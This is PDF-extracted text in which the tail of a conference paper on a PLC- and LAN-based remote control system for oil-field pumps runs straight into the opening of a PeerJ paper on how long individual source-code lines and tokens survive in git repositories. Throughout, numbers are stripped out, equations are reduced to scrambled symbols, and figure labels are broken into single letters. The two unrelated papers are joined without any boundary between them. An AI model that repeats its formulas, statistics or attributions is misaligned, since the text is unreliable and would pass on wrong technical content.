otherwise the pressure is too high, which will cause the ecological disaster, such as the leakage of the oil pipeline and other ecological disasters. if the pressure of oil which come from the total mechanism is too high beyond the tolerance range of pump or filter clogging. then it need to cut off the entrance to the oil pump, and make oil tank failure directly into the cache. the crude oil level fault tank inside the cache reaches a certain height and then through the oil pump output out. iii. network topology and macro structure of distributed measurement and control system for oil pump according to surveying the distribution of oil pump in changqing oil field, daqing oilfield and yanchang oil field, they are most regularly distributed in the wilderness. no matter the size of the oil field, their physical equipment and technology are basically the same, and an oil field generally is made up of several #, #... n# oil pump. in the follow-up article content the network topology is designed firstly, and the overall macro structure is further designed. a. topology design of system network according to the characteristics of the operation process of the oil pump and the objective reality of the dispersion distribution of the multi-pump, a network topology of the oil pump remote measurement and control system as shown in figure is designed. this system is a typical star topology. all peripheral terminals ipc are connected to a remote control center (rcc) computer through an enterprise lan router. this central node manages the access and control of multiple distributed terminal nodes, and forms a distributed control system based on the network (ndcs), which is an extended application of the traditional dcs theory [ ]. ndcs adopts the basic design idea of centralized management, centralized operation, dispersive measurement and decentralized control, and adopts the structure form of multi-layer classification and network communication. figure . oil pump distributed measurement and control network topology b. overall macro structure of system remote measurement and control according to the characteristics of the network topology and the detailed requirements for the measurement and control of the oil pump, and following the principle of top- down and gradual subdivision, we have designed the overall macrostructure of the system ndcs as shown in figure . the whole system is designed in a hierarchical way. there are four levels. the whole system is pump layer (sensor layer), plc layer (control layer), ipc layer (conversation layer) and rcc layer (management layer) from below [ ]. the specific description is as follows: ) the bottom of the system is the oil pump layer, that is, the pump layer is also known as the sensing layer. oil pump is the measure and control object of the whole system, composed of various sensors and actuators, including pressure, temperature, liquid level, flow rate, switch and other sensing signal input, main pump and standby pump start and stop switch output, three-way valve regulating opening size, analog output and digital frequency control of oil pump frequency converter. ) the middle and lower layer of the system is the plc layer, also known as the control layer. plc consists of cpu, rs , rj , and extension modules. the extension module includes the switch quantity i/o unit, the analog input a/d unit, the analog output d/a unit, all of which are connected with the cpu through the internal bus. rs is embedded in the external communication bus on the cpu unit. it is based on the standard modbus rtu and inverter to control the serial communication [ ]. rj is the standard ethernet port on the cpu unit, which is connected to the upper middle ipc mainly through the fins net protocol. ) the upper and middle layer of the system are #, #, …n# ipc layer which consists of local ipc of the oil pump. on the one hand, the ipc layer carries on the local measurement and control through the fins net to plc's conversation. on the other hand, it transfers the local data or accepts the rcc remote control instruction through the international conference on sensor network and computer engineering (icsnce ) conversation between the enterprise lan and the top rcc, so it is also called the conversation layer. figure . oil pump control system hardware macro structure ) the top layer of the system is the rcc level. it can perform data acquisition, curve display, early warning analysis, dynamic process picture, parameter setting and other functions for all oil pumps, it realizes the remote centralized operation and management of the oil pump group through the network, so it is also called the management layer. designing the remote distributed centralized control of the oil pump into different arrangements, each layer requires a different software subsystem to implement separately, the upper and lower layers connect through the hardware circuit and the software api interface function, software subsystems of different layers can be studied and developed in parallel. this not only reduces the complexity of the overall system, but reduces the development cycle. iv. distributed control system software for oil pump in the hardware layering of the system besides the pump layer sensor has a standard circuit interface, so it does not require programming. the other layers need to design the corresponding software subsystems separately, which includes: the field plc field measurement and control software subsystem, the ipc local session software subsystem and the rcc remote management software subsystem. a. the field plc field measurement and control software subsystem this system uses cj m- plc as the field oil pump controller which comes from a famous omron company in the field of automation, of which software development uses the cx-program v . integrated development environment. using the ladder graph lad that follows the iec standard and compiling the scl-st language, five cyclic control scl-st subroutines are designed, and its plc main ladder lad program is shown in figure . figure . plc main ladder diagram lad program each cycle control subprograms are executed periodically under main control scheduling that implements the management of their start-up, concurrency, synchronization, and stop. the detailed description of the content is as follows: ) data collection circular subroutine analogwork: completing acquisition of module data such as multiple analog ad -v , switch quantity id and so on. these data acquisition needs to be filtered and remove the interfering data and store it in the dm area. the system uses external serial communication tcp / ip remote access n# pump local ipc (local hmi) oil pump remote control center computer (rcc) lan n # pump local programmable logic controller (cpu) plc external fins net communication a/d unit d/a unit i/o unit in le t o u tle t p re ssu re se n so r p u m p te m p e ra tu re se n so r o u te r o u tle t flo w se n so r a c c id e n t b u ffe r le v e l se n so r m a in th re e -w a y sw itc h b a c k u p th re e -w a y sw itc h p u m p s o n /o f f o p e ra tio n s o le n o id v a lv e o u tp u t sw itc h p u m p s o n /o f f s ta te in p u t plc internal bus plc internal bus m a in p u m p fre q u e n c y b a c k u p p u m p fre q u e n c y rs rj # pump local ipc (local hmi) …… # oil pump plc international conference on sensor network and computer engineering (icsnce ) the rc low pass filter for smoothing the data, and its mathematical transfer function is: )( )( )(   f s tsx sy g , tf=rc is the time constant of the filter, dispersing the mathematical function to obtain the plc, the difference algorithm formula for its implementation is: y(n)= α y(n- )+( - α )x(n), tt t f f  α ,t is the sampling period, x (n) is the current nth sample, y (n) is the current filter result data of the nth. ) logic control loop processing subroutine logicmodule: completing all the internal logic control functions of the system, it has a raw rule library inside. written by the plc st language, the rule form is the former condition (the execution condition) a - the following condition b (regular body), condition a and b can also be compound logical expressions composed of operators such as not, and, or, xor and so on. a represents the logical operation conditions, and b represents processing. for example: if mainpumprun and oilpressurehigh then setalarmon and setpause on, of which expression means that when the main pump is running and the pressure is too high, plc immediately outputs the alarm and pause the system. ) pressure pid control loop subroutine pidwork: completing the frequency pid control of the frequency converter , that is to use the pid algorithm to control the speed of the main pump or the pump to achieve the outlet pressure in line with the pressure curve set by the oil pump process. the differential equation of the pid control algorithm in plc is [ ]:         t d i p dt tde tdtte t tektmv )( )( )()( in the formula, )()()( tpvtsvte  is a deviation, it represents the running time of the controller, the ti is the integral coefficient, the td is the differential coefficient, and the kp is the ratio coefficient, mv(t) indicates the output of the output t time of the algorithm. this subsystem uses scl- st code programming to achieve incremental pid control in omron plc, when running, select the appropriate proportion p, integral i, differential d parameters, and of course you can also call plc built-in pid instructions to achieve. ) three - way switcher control loop subroutine davalvectl: completing flow control of oil pump, on the one hand it controls the da output of the three - way valve, on the other hand it controls the oil pump to be executed automatically according to the selected process. the main control processes are varied. according to time plan timeplan to performs the main standby pump in turn, and it performs pump according to the flow plan fluxplan, and executes pumps in turn according to the oil pump temperature plan tempplan and so on. ) communication response loop subroutine commwork: on the one hand, the rs communication is done to the transducer of the sensing layer, and on the other hand, the rj communication for the upper ipc is prepared. plc and frequency converter communication follow the standard modbus rtu protocol, its command frame format as shown in table . table i. rtu transmission mode command frame format pump slave address function code data checksum bits( - ) bits( - ) n* bits bits(crc ) it complies with the fins tcp industrial ethernet communication standard when plc and ipc carry out rj network communications. it is compatible with any ethernet, controller link and sysmac link network system [ ]. its protocol format adds a fins header to the traditional tcp / ip. b. ipc local session software subsystem the oil pump ipc local session software subsystem is developed based on the object-oriented (oop) integrated environment and completed by the programming mechanism of multi thread (multi-thread). according to the function of the system, the multithreading workflow of the ipc local session subsystem is designed as shown in figure . considering that the oil pump is a special key equipment in the oilfield enterprises, the users of the system have oil pump technicians, equipment safety personnel, ordinary operation workers, system administrators, etc., and they have different tasks in the oil pump operation, so subsystem design uses role based access mechanisms, in which different roles have different permissions when accessing the system. the thread is managed by the user role, and then the thread is selected by the role permission interface to produce different running interfaces. the other threads run in parallel, and they all have their own cruntimedata space that does not interfere with each other, concurrently completing: downlink and plc real-time carry out rj fins communication, the uplink and remote rcc complete the tcp/ip communication, the oil pump data processing record storage, the oil pump dynamic curve display and the plc operation parameter view setting and so on function. international conference on sensor network and computer engineering (icsnce ) figure . oil pump ipc local conversation subsystem multithreading design after ipc collecting of plc data, it should be stored after operation, for example, in the "oil pump data processing record storage thread", by collecting the oil flow rate f (t), the calculation of oil transmission tired measurement needs to be completed by the digital integration algorithm, and its mathematical expression is:  tb ta dttf )(q , among them, q indicates the accumulation of oil, ta indicates the beginning time, tb is the end time, and f (t) is the function of oil flow collection. when the programming is realized, the solution is solved by the complex simpson algorithm, and its discrete formula is as follows:     )( )()([ )(v n k kba tb ta xftftf h dttf ])(     n k kxf among: hkta xx x kk k ) / (      illustration:[ta, tb] is divided into n parts, taking equidistant nodes. c. rcc remote management software subsystem the rcc remote management software subsystem is based on the real-time requirements and special requirements of the oilfield lan, and its design uses the classic industrial control c/s architecture. the human-machine interface of the subsystem proceeds from the whole situation of the management of all oil transport pumps in the oil field enterprises. it is more than the ipc local subsystem to manage and dispatch the threads of the production and operation of all oil transport pumps and the thread of the remote safety decision analysis of the global oil transmission equipment, and the other is similar to the ipc local subsystem, which is limited to the length of the text. the rcc remote management software subsystem focuses on the global remote control management function, then it can collect all the data of the oil pump, and then carry out large data analysis and process data mining, adopts a data mining algorithm based on classical apriori algorithm for association rules. the main code is as follows: procedue oilpumpapriori(lk); begin l ={large -itemsets}; for (k= ; lk- <>; k++) do begin ck=apriori_gen(lk- ); for all transactions td do begin ct=subset(ck,t); for all candiates cct do c.count= c.count+ ; end lk={ cck|c.countmin_sup } end; l= kk l ; end. v. conclusion by using an object-oriented integrated development environment in the windows operating system, embarcadero rad studio xe、cx-program v . and open source network database mysql . , the distributed measurement and control system of oil delivery pump based on plc and lan is successfully developed. the system has been successfully applied in a chinese oil field enterprise, and the actual development of rcc remotely the human- machine interface of one of the stations in which the oil pump operates as shown in figure . after a year of feedback from the company, it shows that the system has high information level, reduced the difficulty of multi pump collaborative management, improved the efficiency of equipment safety management, and greatly reduced the operation cost of oil production. this article putted forward the remote control system which uses lan and plc to design in a hierarchical manner, and it simplifies the problem of complex equipment measurement and control. so it provides a better design method and model for remote control of similar equipment and has a strong practical application and promotion value. oil pump ipc user role management thread plc operating parameters view set thread select interface thread based on role pump dynamic trend curve show thread pump dynamic process screen show thread pump data processing records stored thread uplink tcp / ip communication processing thread downlink rj communication processing thread international conference on sensor network and computer engineering (icsnce ) figure . rcc remote site oil pump process operation interface acknowledgment the research is supported by the new network and detection control national and local joint engineering laboratory. (financing projects no. gsysj ). references [ ] cui hai-li, zhao hai-jun, chen peng, “oil pump performance detection and fault analysis,” petro-chemical equipment, vol. , pp. - , april [ ] wang li-wen, chen yuan-jun, chen bin, “aircraft ground deicing monitoring system based on gprs and plc,” computer engineering and design, vol. , pp. - , aguest [ ] zhang nai-lu, li yong-jin, zhang yu-xiang, “gas station integrated information monitoring system based on internet of things,” microelectronics & computer, vol. , pp. - , february [ ] qi lei, han zhe, chen shuang, chen zhao, “design and realization of the measuring and controlling system of vacuum making wave machine based on s - ethernet communication,” industrial instrumentation & automation, vol. , pp. - , march [ ] wu qiu-yang, li tian-ping, “improvement and application of dcs gas-fried oven temperature control system,” journal of shandong normal university(natural science), vol. , pp. - , march [ ] e.b.priyanka, c.maheswari, b.meenakshipriya, “parameter monitoring and control during petrol transportation using plc based pid controller,” journal of applied research and technology, vol. , pp. - , february software evolution: the lifetime of fine-grained elements software evolution: the lifetime of fine-grained elements diomidis spinellis , , panos louridas and maria kechagia department of management science and technology, athens university of economics and business, athens, greece department of software technology, delft university of technology, delft, the netherlands department of computer science, university college london, london, uk abstract a model regarding the lifetime of individual source code lines or tokens can estimate maintenance effort, guide preventive maintenance, and, more broadly, identify factors that can improve the efficiency of software development. we present methods and tools that allow tracking of each line’s or token’s birth and death. through them, we analyze . billion source code element lifetime events in revision control repositories. statistical analysis shows that code lines are durable, with a median lifespan of about . years, and that young lines are more likely to be modified or deleted, following a weibull distribution with the associated hazard rate decreasing over time. this behavior appears to be independent from specific characteristics of lines or tokens, as we could not determine factors that influence significantly their longevity across projects. the programing language, and developer tenure and experience were not found to be significantly correlated with line or token longevity, while project size and project age showed only a slight correlation. subjects programming languages, software engineering keywords software evolution, code decay, software aging, hazard rate, repository mining introduction although there is a significant body of work regarding the macroscopic characteristics (gonzález-barahona et al., ) and even laws (lehman, ) of software evolution (herraiz et al., ), much less is known about how software evolves at the microscopic scale, namely at the level of lines, statements, expressions, and individual tokens. a study of such details, apart from its self-supporting merits as curiosity-driven empirical research, can derive results that can in the future be used for improving software development processes (humphrey, , p. ), architecting software systems (barnes, pandey & garlan, ; breivold, crnkovic & larsson, ), developing machine learning algorithms (allamanis et al., ; alon et al., ), organizing software development teams (rodríguez et al., ), estimating maintenance effort (albrecht & gaffney, ; atkins et al., ; zimmermann et al., ), designing new features for configuration management systems (white et al., ; jiang, armaly & mcmillan, ), locating software faults (cotroneo, natella & pietrantuono, ; giger, pinzger & gall, ; kechagia et al., ; salfner, lenk & malek, ), guiding probabilistic programing (gordon et al., ), and enhancing programing languages (vallée-rai et al., ). here we report on methods, tools, and the results we obtained by studying the lifetime of how to cite this article spinellis d, louridas p, kechagia m. . software evolution: the lifetime of fine-grained elements. peerj comput. sci. :e doi . /peerj-cs. submitted november accepted january published february corresponding author diomidis spinellis, dds@aueb.gr academic editor philipp leitner additional information and declarations can be found on page doi . /peerj-cs. copyright spinellis et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:dds@�aueb.�gr https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ unmodified code lines and tokens in revision control repositories over . billion source code element lifetime events. at the point where the rubber hits the road, software consists of code lines. their number has been extensively studied to gain insights on topics ranging from development effort (albrecht & gaffney, ; gousios, kalliamvakou & spinellis, ; lind & vairavan, ) and quality (buse & weimer, ; kan, ; stamelos et al., ; zhang, ) to software growth (van genuchten & hatton, ; godfrey & tu, ; hatton, spinellis & van genuchten, ; herraiz, gonzález-barahona & robles, ). this work contributes to the study of software evolution by looking quantitatively, not at changes in the number of code lines, but how and why individual lines or tokens change over the software’s lifetime. first, consider how long a line of code survives in its initial form. as software evolves over time, some lines are added, others are deleted, and existing ones are modified. from the time that a line enters the code base of a project, for how long does it live, that is, for how long does it remain there unchanged? are lines of code more of a durable asset that will be around for the long time, or are they more like perishable assets, that will only remain for a short time? how is their lifetime related to factors such as a system’s size or the employed programing language? a process model of aging can be further elaborated through quantitative characteristics. these include the mathematical function that determines when existing lines are likely to “die”. we define as the line’s death its deletion or the modification of its non-whitespace elements, and further examine the validity of this construct by also looking at the lifetimes of individual tokens. in functions that are used to characterize decay processes, their characteristic unit is often expressed through the measure of median lifespan: t½. if a line i is added at time ti, and is changed or disappears at time ti; , its lifespan is ti, − ti, . the median lifespan, over all lines of a project, is the median value of all line lifespans, that is, the median of ti, − ti, for all i. now take an added line of code. when will this code be changed or be entirely removed and how does its age factor into this question? one can imagine three possibilities. the first, a high infant mortality scenario, in which new lines of code are often changed as developers fix newly-introduced faults and refactor the code. the second, a senescence scenario, has code lines become outdated and less useful as they age and therefore face increasing chances of being replaced. the third, stochastic scenario, has lines getting replaced mostly due to other factors through what appears to be a random process with regard to their age. in practice, it is likely that all three scenarios play a role, but it is still possible that one of them dominates the aging process. finally, consider some reasons for which a line may change. these include misunderstood requirements, a fault in the code, or changes cascading from other work. while these are typically qualitatively analyzed, one can also examine the factors associated with them, such as the line’s complexity, its developer’s seniority, the project’s size, or the employed programing language. apart from its theoretical importance, a model of code aging at the level of code lines is useful in several ways. many potential applications are listed in the opening paragraph; spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ here are two concrete examples. first, the model can inform managers where to direct maintenance effort, for example to reduce the acquired technical debt (kruchten, nord & ozkaya, ) or address newly-discovered security vulnerabilities (ozment & schechter, ; penta, cerulo & aversano, ; shin et al., ). under the infant mortality scenario old lines are likely to remain in a project for ages, so they should periodically receive some love and care to keep them up to date with modern practices. in contrast, under the senescence scenario these will gradually fade away, so effort invested in maintaining them may be wasted. second, the function expressing code age and its coefficients for a specific project can be used to guide maintenance effort estimation. this is important because humans are often biased when estimating development effort (løhre & jørgensen, ). simplistically, effort is often measured in terms of code lines (albrecht & gaffney, ; gousios, kalliamvakou & spinellis, ; lind & vairavan, ). therefore, if, given the age of existing lines, we can estimate how many of the project’s lines are likely to change in the next year, this, together with the project’s estimated code growth rate (hatton, spinellis & van genuchten, ), can roughly determine the required development effort. more broadly and importantly, given that code lines require effort to change, identifying and controlling factors that promote longer- living lines—for instance through better abstraction mechanisms—can direct improvements in software development efficiency. the contributions of this article are the development of an efficient method and tools that allow the tracking of the birth and death of individual source code lines and tokens over periods that can span decades and the empirical analysis of . billion source code element lifetime events to answer the following research questions. rq for how long does a line of code or token live? the answer to this question determines whether code elements are durable or perishable. rq how is a line’s or token’s age related to the probability of its change or deletion? the answer tells us whether younger code elements are more vulnerable to change and deletion (infant mortality), or whether older ones are more frail (senescence), or whether there are no age-related hazards. rq what other product or process factors may influence a line’s or a token’s survival? we investigate this question along the following dimensions. rq a the line’s characteristics, which may reveal change-prone programing constructs or drivers of change. rq b the different token types, which may affect the lifetime of the tokens. rq c the committer’s experience and tenure; one might expect senior developers to write more stable code. rq d the project’s size, which might lend it inertia against change. rq e the employed programing language, demonstrating whether some programing languages lend themselves for writing more stable (or, alternatively, flexible) code. methods we studied code aging at the level of individual source code lines by selecting a number of suitable revision control repositories to study, coming up with a way to handle merges of spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ development branches, constructing a tool that can track the lifetime of individual lines across successive software releases, creating a process and tools to also study the lifetime of individual tokens, choosing the statistical methods that best suited the domain, and applying them to the collected data. as recommended by ince, hatton & graham-cumming ( ), the source code and data associated with our results are openly available online. material selection we ran our study on open source software repositories due to their liberal availability and the fact that this simplifies the replication of our findings. we selected the revision control repositories to study based on five objective criteria consistent with our research goals. github hosting we only selected projects whose history is available on github. this decision simplified the methods we used to select the projects and to traverse a project’s revisions. the choice to use only github-hosted repositories is not as restrictive as it sounds, because nowadays even projects that use other version control systems and hosting often make a (typically read-only) git version of their repository available on github. longevity we selected projects with at least ten years of commit data in order to obtain enough samples for statistical analysis. active development the code in the repository had to be actively developed as determined by code commits. obviously, code in dormant projects does not exhibit aging processes and cannot be usefully modeled. to examine projects that are actively developed we calculated the number of weeks over the project’s lifetime in which at least one commit had occurred. we then selected projects in which commits occurred in at least % of the weeks to take into account vacation time. we examined activity at weekly granularity, because some open source developers may only work over weekends. popularity we selected projects having at least github “stars”. results from popular projects are likely to be relevant to more people than those from obscure ones. studying code aging in small test projects or student exercises is less likely to yield results of industrial relevance. programming language to study source code evolution at the level of individual tokens as well as lines, we only selected projects whose main programing language, as reported in ghtorrent (gousios & spinellis, ), is supported by the tokenizer we used (spinellis, ). these languages were selected based on their popularity among the projects selected using data: https://doi.org/ . /zenodo. ( . gb compressed, gb uncompressed); source code: https://doi. org/ . /zenodo. . spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://doi.org/ . /zenodo. https://doi.org/ . /zenodo. https://doi.org/ . /zenodo. https://doi.org/ . /zenodo. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the other criteria, and cover % of the repositories initially selected. the languages processed are c, c#, java, php, and python. we performed the project selection through analytical processing of the ghtorrent data set (january version) based on the process described by gousios & spinellis ( ). the code information was obtained by downloading and processing each selected revision of the corresponding repository. other than the stated selection criteria, we did not perform any other manual adjustments to add popular projects or exclude obscure ones. we ensured that our data set did not include duplicated projects by pairing it with a dataset for github repository deduplication (spinellis, kotti & mockus, ). from the one duplicate and two triplicate sets we thus found we retained the repositories with the longer commit history. specifically, we chose github.com/droolsjbpm/drools over kiegroup/drools and droolsjbpm/guvnor, lede-project/source over openwrt-mirror/ openwrt and openwrt/packages, and doctrine/doctrine over doctrine/dbal. in total we analyzed projects, comprising at the end of the studied period thousands of source code files, millions of source code lines, millions of source code tokens, and . millions of examined commits. in terms of source code lines, we analyzed million code line lifetime events: the appearance of and the demise of millions of source code lines. in terms of individual source code tokens, we analyzed . billion code token lifetime events: the appearance of , and the demise of millions of source code tokens. key metrics of the projects we analyzed are listed in table . history simplification software development with distributed version control repositories is characterized by the frequent generation of feature development branches and their subsequent merging into a more mainstream trunk (german, adams & hassan, ). for example, the repositories we analyzed contained a total of thousand merges, or about three table descriptive statistics of the analyzed repositories and aggregate totals. metric min max median mean σ total all files , , , , , analyzed source code files , , , , , analyzed source code lines (thousands) , , , analyzed source code tokens (thousands) , , , , , committers , , ghtorrent project duration (years) analyzed branch duration (years) all commits (thousands) , analyzed commits (thousands) , line deaths (thousands) , , , , token deaths (thousands) , , , , , project stars , , , commit density (weekly %) spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://github.com/droolsjbpm/drools https://github.com/kiegroup/drools https://github.com/droolsjbpm/guvnor http://github.com/lede-project/source http://github.com/openwrt-mirror/openwrt http://github.com/openwrt-mirror/openwrt http://github.com/openwrt/packages http://github.com/doctrine/doctrine http://github.com/doctrine/dbal http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ thousand per project. as we detail below, merges confuse and complicate the processing of history and therefore required devising a scheme to deal with them. the confusion arises from the fact that a topological ordering implied by the directed acyclic graph structure of a project’s commit history will lose code changes or their time ordering. (a topological ordering of a directed graph is a linear ordering of its vertices such that for every directed edge ab from vertex a to vertex b, the linear ordering has a appear before b.) applying the typically-used three-way merge algorithm will result in the loss of code modifications, because the common ancestor will no longer be correctly represented. the complexity of merges has to do with how changes listed at the point of a merge can be automatically processed to obtain the code after it. in experiments we performed with diverse git output options we found that the output of git log and also git format-patch was not a reliable way to reconstruct the state of a project from its history (spinellis, a). consequently, the output could also not be used to track the lifetime of individual lines. although we did not look for the root cause of these problems in depth, we only encountered them when working with merges, which leads us to believe that they were indeed caused by merges. using git’s combined diff format for merges is also unlikely to help, because, according to git’s git diff documentation “combined diff format was created for review of merge commit changes, and was not meant for apply”. and if dealing with binary merges was not bad enough, handling n-way merges, such as those handled by git’s octopus-merge algorithm, added even more complexity to the problem. consequently, we decided to simplify the commit history into a linear ordering by removing the least essential branches and merges. the rationale behind this decision is that each merge point captures changes that have happened on both branches; if the time difference from the branch to the subsequent merge is not too large, then the represented lifetime of the affected lines does not change substantially. (see analysis in the “threats to validity” section.) an additional advantage of this approach is that it presents a commit sequence that is both topologically and temporarily ordered. to obtain this linear ordering, we took the topological ordering of the project’s commit graph and obtained the longest path in it. for directed acyclic graphs this path can be calculated in linear time, by having each vertex record its length as the maximum length of its parent neighbors plus one. then the longest path can be obtained by traversing the graph along the vertices with the maximum recorded values. figure illustrates an example of a commit graph and its longest path. the simplification of history resulted in the reduction of examined commits from . million to . million, meaning that we processed about % of all commits. lifetime tracking one could in theory obtain an indication regarding the lifetime of individual lines by sampling the output of the git’s blame command at various time points. however, this process is computationally intensive and will only provide an approximation. to address these issues we designed an online algorithm and a corresponding open source tool spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (named lifetime) that continuously tracks the lifetime of code lines across successive commits. tracking the lifetime of individual code lines across code commits is not trivial. an earlier study that demonstrated the estimation of code decay in the unix operating system source code over the period – , employed the git blame command to record the age of lines at the point of each one of releases (spinellis, b). changes over the sampled releases in the cardinality of sets representing lines born at a specific point of time were then used to estimate the lifetime of the corresponding lines. however, this method is quite inaccurate, since the lifetime estimates are bound between the dates of two successive releases. furthermore, it is also computationally expensive. the specific task required (on a massively parallel supercomputer) . core years cpu time, , cores, . tb ram, and gb of disk space. in fact, our case of k files × . m commits would require two orders of magnitude more resources. in common with most version control systems, git can output the differences in a file between two commits as a series of line additions and removals. (changes are represented as an addition and removal.) by default, this operation uses the popular myers algorithm (myers, ) to minimize the presented differences. in common with the work by zimmermann et al. ( ), we processed the output of unix (git) diff, rather than alternatives such as lhdiff (asaduzzaman et al., a), because diff operates fast and its output is machine-readable. a line may appear in the output of a commit’s differences for several reasons: ( ) actual deletion—within a retained file or through a file’s deletion, ( ) changes in identifier names, ( ) other non-whitespace changes, ( ) movement to another part of the same file, ( ) movement to another file, ( ) change of indentation, or ( ) other cosmetic— whitespace—changes. reasons and are definitely signs of the line’s death that are relevant to this study: a (most-probably) functional modification. our methods also consider as a line death reasons and , because it is difficult to identify such changes with the tools we employed. we deal with these potential shortcomings by expanding our methods to track changes of individual tokens and by measuring the effect of line moves. we were also able to continue tracking through their lifetime lines that change due to reasons – . first, we set git diff to ignore all changes in a line’s whitespace. this filtered out noise introduced by indentation adjustments induced through other changes as well as figure branch graph path length attributes and the longest path. full-size doi: . /peerj-cs. /fig- spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ changes in a file’s tab (hard vs soft tabs) or end-of-line (the use of line feed and carriage return) representation. second, we configured git diff to detect file renaming and copying, in order to follow cross-file code movements. an example of the git diff output format processed by the lifetime tool we built appears in listing . line is a custom commit header we employed, containing the commit’s sha identifier and its timestamp. the commit involves changes to two files; lines and show the old and new names of the files being compared. when a file is removed or newly added the new file name (in the case of removals) or old file name (for additions) is /dev/null (the unix empty file). lines – and – contain metadata that is not important for the task at hand. lines – show the addition of two lines at the new file range + , listed in the @@ line. lines – do the same for the second (newly-created) file. lines – show a line’s change: line of the old version’s file is replaced by line in the new version’s file. in the new file version. a series of extended headers can appear after the diff line to indicate file deletions, renames, and copies, which git detects by applying heuristics in the compressed repository state snapshot stored for each commit. the lifetime program works by processing a series of git diff outputs (such as those detailed in the preceding paragraph) using the state machine depicted in fig. . state transitions take place when input lines match the regular expressions shown in the diagram. listing example of git diff output. commit dfdcb a […]de b d diff −−git a/main.c b/main.c index da.. a f d −−− a/main.c +++ b/main.c @@ − , + , @@ +#include “message.h” + @@ − + @@ main(int argc, char *argv[]) − printf (“hello, world”); + printf (message); diff −−git a/message.h b/message.h new file mode index ..be a e −−−/dev/null +++ b/message.h @@ − , + @@ +#define message “hello, world” available in this study’s source code package at https://doi.org/ . / zenodo. and also on github https://github.com/dspinellis/code- lifetime. spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://doi.org/ . /zenodo. https://doi.org/ . /zenodo. https://github.com/dspinellis/code-lifetime https://github.com/dspinellis/code-lifetime http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the operations can be expressed through the following notation. � the timestamp tc associated with commit currently being processed. � a partial function t : ðf; lÞ ! tb mapping each integer-numbered line l of file f onto its birth time tb. � another partial function b : f ! v, that yields true when a file f contains binary data (e.g., an image). � the last line of each file fe ¼ max l : t f; lð Þ ¼ ?f gð Þ. the rules applied when processing the git diff data are the following. . for each code line numbered l added to file f that the program encounters (e.g., lines , , , in listing ), it remaps existing timestamps from l until the end of the file e in the map t it maintains to make space for the new line, and it inserts an entry in the timestamp map with the current timestamp tc ( in line of listing ). l ðl::feÞ; t ðf; l þ Þ ¼ tðf; lÞ t ðf; lÞ ¼ tc . for each code line numbered l deleted from file f that the program encounters (e.g., line in listing ), it outputs a tuple with the line’s birth time and the time of its demise, figure state machine for git diff output processing. full-size doi: . /peerj-cs. /fig- spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ðtðf; lÞ; tcÞ and it remaps the timestamps of the lines from l until the end of the file e to close-up the gap of the deleted line. l ðl::fe � Þ; t ðf; lÞ ¼ tðf; l þ Þ t ðf; feÞ ¼ ? . when changes to a binary file f are encountered, this file is marked as binary in a map b, and no further output is ever performed on operations on that file. this is needed because changes to binary files are not identified in terms of lines, so further changes when a file reverts to text format will not have correct timestamps to refer to. bðfÞ ¼ true . when a file fa is identified as copied to file fb, new map entries are established with the original line birth dates and the binary file status is also transferred to the new file. l :: max fae; fbeð Þð Þ; tðfb; lÞ ¼ tðfa; lÞ bðfbÞ ¼ bðfaÞ . when a file fa is identified as renamed to file fb, new map entries are created as above, and the existing ones are removed. . after processing all commits, lifetime outputs tuples with the birth timestamps of all lines that are still alive and the word alive. tðf; lÞ; aliveð Þ : tðf; lÞ ¼ ?f g the processing is complicated by the fact that all change references to the existing state of a commit, refer to the state before any change has been applied to any of the files; changes are not supposed to be applied while processing a commit. for example, if a commit renames file fa to fb and fb to fa the names of the two files will be correctly swapped. also, changes to a file that has been copied or renamed in the same commit refer to the name of the file before the corresponding operation. this complication is addressed by recording all changes in a queue as instructions to add or remove elements from the timestamp map t. when all elements of a commit have been processed, a routine replays the recorded changes on the current state to generate the new one. considerable effort was invested in making the lifetime program easy to test and troubleshoot. this was needed for three reasons. first, the output of git-diff seems to be only informally defined and involves many special cases. second, tracking line timestamps by hand to verify the program’s operation is a complex and error-prone process. third, errors were encountered in the middle of processing data hundreds of gigabytes in size; isolating these errors proved to be a challenging task. in order to help testing and troubleshooting the lifetime program supports eight command-line options that configure it to output diverse data regarding the processing it performs. a separate option can be used to terminate the processing at a specific commit, thus allowing the examination of the data at the given time point. the most important of spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the debug options, modifies the program’s operation to store in the map t the complete content of each added line, rather than the current timestamp tc. then, when a line is removed, it is compared with the map’s content to verify that the two match. any differences signify a failure in the process to record the changes. such differences allowed us to find that the output of git log and git format-patch were not trustworthy enough for our purposes. furthermore, the same debug option uses the map’s contents to reconstruct a copy of the project’s file tree, when all its commits have been processed. comparing the file tree against a checked-out version of the project allows the end-to-end verification of the program’s operation. the lifetime program is accompanied by two git repositories containing tens of diverse commit cases. a test script is used to compare the reconstructed state against the original one at the end of each commit. analysis of individual tokens although lines of code are often used to measure software and its evolution, tracking changes at the level of lines can threaten the results’ validity. specifically, small changes, such as renaming an identifier, will appear to change many lines. in addition, a line may appear to change through edits unrelated to it, such as the addition of a brace when a statement is added below it. consequently, it would be valuable to track evolution at the level of individual tokens rather than lines. we designed and implemented a process and tools to track the birth and demise of individual tokens based on an idea by german, adams & stewart ( ). this involves creating a synthetic git repository where files are stored as one token per line. the setup can be traced to 